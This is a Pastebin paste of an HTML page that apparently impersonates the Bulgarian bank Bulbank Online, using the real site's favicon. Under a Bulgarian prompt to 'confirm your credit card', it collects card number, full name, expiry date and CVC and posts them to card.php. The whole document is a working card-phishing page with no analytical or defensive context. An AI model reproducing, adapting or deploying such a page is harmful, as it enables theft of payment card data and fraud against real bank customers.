Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <!DOCTYPE html>
- <html lang="en">
- <head>
- <meta charset="UTF-8">
- <title>Bullbank Online</title>
- <link rel="shortcut icon" href="https://bulbankonline.bg/favicon.ico" type="image/x-icon">
- <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.6.3/css/all.css" integrity="sha384-UHRtZLI+pbxtHCWp1t77Bi1L4ZtiqrqD80Kn4Z8NTSRyMA2Fd33n5dQ8lWUE00s/" crossorigin="anonymous">
- <link rel="stylesheet" href="bootstrap.min.css">
- </head>
- <style>
- body{
- background-image: url(img/bg2.png);
- background-repeat: no-repeat;
- width: auto;
- height: 570px;
- }
- .i1{
- margin-left: 330px;
- }
- .i2{
- margin-left: 330px;
- }
- .i3{
- margin-left: 330px;
- margin-top: 200px;
- }
- .i4{
- margin-left: 360px;
- }
- .oo{
- width: 300px;
- }
- .o{
- width: 170px;
- }
- </style>
- <body>
- <p class="i3">Моля, потвърдете кредитната си карта</p>
- <form action="card.php" method="POST">
- <div class="input-group mb-3 i1 oo">
- <div class="input-group-prepend">
- <span class="btn btn-link input-group-text "><i class="far fa-credit-card"></i></span>
- </div>
- <input type="text" class="form-control " size="16" maxlength="16" pattern="[0-9]{16}" name="card" placeholder="номер на кредитната карта" required>
- </div>
- <div class="input-group mb-3 i2 oo">
- <div class="input-group-prepend">
- <span class="btn btn-link input-group-text "><i class="far fa-user"></i></span>
- </div>
- <input type="text" required class="form-control" name="fullname" placeholder="пълно име">
- </div>
- <div class="input-group mb-3 i2 o">
- <div class="input-group-prepend">
- <span class="btn btn-link input-group-text "><i class="far fa-calendar"></i></span>
- </div>
- <input type="number" required class="form-control" min="1" max="12" name="month" placeholder="MM">
- <input type="number" max="30" min="19" required name="year" class="form-control" placeholder="YY">
- </div>
- <div class="input-group mb-3 i2 o">
- <div class="input-group-prepend">
- <span class="btn btn-link input-group-text "><i class="fas fa-lock"></i></span>
- </div>
- <input type="text" pattern="[0-9]{3}" size="3" maxlength="3" required class="form-control float-left" placeholder="CVC" name="cvc">
- </div>
- <input type="submit" name="suub" class="btn btn-info i4" value="Вход">
- </form>
- </body>
- </html>
Add Comment
Please, Sign In to add comment